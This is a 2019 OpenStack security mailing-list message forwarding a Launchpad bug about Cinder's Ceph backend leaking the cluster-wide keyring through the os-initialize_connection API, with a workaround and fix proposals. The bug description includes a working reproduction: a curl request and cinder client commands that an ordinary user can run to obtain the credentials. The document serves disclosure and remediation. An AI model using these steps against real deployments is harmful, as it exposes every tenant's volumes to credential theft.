[Openstack-security] [Bug 1849624] Re: ceph backend, secret key leak
Brian Rosmaita
rosmaita.fossdev at gmail.com
Thu Oct 31 13:39:13 UTC 2019
A note about step 2 in the Quick Workaround in the bug description:
Gorka Eguileor noticed that the correct file location is actually:
/etc/ceph/<cluster_name>.client.<user_name>.keyring
See https://opendev.org/openstack/os-brick/src/commit/87171abef8bf2336f15ce3a7949f77d7999e11b7/os_brick/initiator/connectors/rbd.py#L76
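For illustration only (the actual names depend on the deployment): with the default cluster name "ceph" and the "cinder" auth user shown in the connection info below, the path os-brick looks for would resolve to:
ls -l /etc/ceph/ceph.client.cinder.keyring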
--
You received this bug notification because you are a member of OpenStack
Security SIG, which is subscribed to OpenStack.
https://bugs.launchpad.net/bugs/1849624
Title:
ceph backend, secret key leak
Status in Cinder:
In Progress
Status in OpenStack Security Advisory:
Won't Fix
Status in OpenStack Security Notes:
Confirmed
Bug description:
Cinder + ceph backend, secret key leak
Conditions: cinder + ceph backend + rbd_keyring_conf set in cinder
config files
As an authenticated regular user, create a cinder volume that ends up on a ceph backend,
then reuse the os.initialize_connection API call
(used by nova-compute/cinder-backup to attach volumes locally to the host running those services):
curl -g -i -X POST https://<cinder_controller>/v3/c495530af57611e9bc14bbaa251e1e96/volumes/7e59b91e-d426-4294-bfc5-dfdebcb21879/action \
-H "Accept: application/json" \
-H "Content-Type: application/json" \
-H "OpenStack-API-Version: volume 3.15" \
-H "X-Auth-Token: $TOKEN" \
-d '{"os-initialize_connection": {"connector":{}}}'
If you do not want to forge the HTTP request yourself, the openstack clients and
their extensions may prove helpful.
As root:
apt-get install python3-oslo.privsep virtualenv python3-dev python3-os-brick gcc ceph-common
virtualenv -p python3 venv_openstack
source venv_openstack/bin/activate
pip install python-openstackclient
pip install python-cinderclient
pip install os-brick
pip install python-brick-cinderclient-ext
cinder create --name vol 1
cinder --debug local-attach 7e59b91e-d426-4294-bfc5-dfdebcb21879
This leaks the ceph credentials for the whole ceph cluster, leaving anyone in possession of them able to go through the ceph ACLs
and gain access to all the volumes within the cluster.
{
  "connection_info" : {
    "data" : {
      "access_mode" : "rw",
      "secret_uuid" : "SECRET_UUID",
      "cluster_name" : "ceph",
      "encrypted" : false,
      "auth_enabled" : true,
      "discard" : true,
      "qos_specs" : {
        "write_iops_sec" : "3050",
        "read_iops_sec" : "3050"
      },
      "keyring" : "SECRETFILETOHIDE",
      "ports" : [
        "6789",
        "6789",
        "6789"
      ],
      "name" : "volumes/volume-7e59b91e-d426-4294-bfc5-dfdebcb21879",
      "secret_type" : "ceph",
      "hosts" : [
        "ceph_host1",
        "ceph_host2",
        ...
      ],
      "volume_id" : "7e59b91e-d426-4294-bfc5-dfdebcb21879",
      "auth_username" : "cinder"
    },
    "driver_volume_type" : "rbd"
  }
}
Quick workaround:
1. Remove the rbd_keyring_conf param from any cinder config file; this mitigates the information disclosure.
2. For cinder backups to keep working, providers should instead deploy their ceph keyring secrets directly on the cinder-backup hosts
(/etc/cinder/<backend_name>.keyring.conf, to be confirmed; see also the corrected location in the note above and the sketch below).
Note that nova-compute hosts should not be impacted by the change, because the ceph secrets are expected to be stored as
libvirt secrets already, so the keyring disclosed here is of no use to nova-compute.
(to be confirmed, as other compute drivers might be impacted by this)
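A minimal sketch of the workaround (paths and names are examples only, using the keyring location from the note at the top of this message; adapt the cluster and user names to your deployment):
# on cinder nodes: drop rbd_keyring_conf from cinder.conf (check backend sections too), then restart the cinder services
sed -i '/^rbd_keyring_conf/d' /etc/cinder/cinder.conf
# on cinder-backup hosts: deploy the ceph keyring directly, e.g. for cluster "ceph" and user "cinder"
install -m 600 ceph.client.cinder.keyring /etc/ceph/ceph.client.cinder.keyring
# on nova-compute hosts the secret should already be held by libvirt:
virsh secret-list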
Quick code fix:
Mandatory: revert this commit https://review.opendev.org/#/c/456672/
Optional: revert this one https://review.opendev.org/#/c/465044/, which is harmless in itself but pointless once the first one has been reverted
Long term code fix proposals:
What the os.initialize_connection API call is meant to do: allow regular users to use cinder as block storage as a service,
attaching volumes outside the scope of any virtual machine/nova.
Thus, the information returned by this call should be enough for the caller to attach the volume, but it should not disclose
anything that would allow them to do more than that.
Since this is not possible at all with ceph (there is no tenant isolation within a ceph cluster),
the related cinder backend for ceph should not implement this route at all.
There is indeed no reason for cinder to disclose anything here about the ceph cluster, including hosts and cluster IDs,
if the attach is doomed to fail anyway for users who lack the secrets.
Then, any 'admin' service using this call to locally attach volumes (nova-compute, cinder-backup, ...) should be modified to:
- check the caller's read/write permissions on the requested volumes
- escalate the request
- go through a new admin API route, not this 'user' one
To manage notifications about this bug go to:
https://bugs.launchpad.net/cinder/+bug/1849624/+subscriptions
More information about the Openstack-security mailing list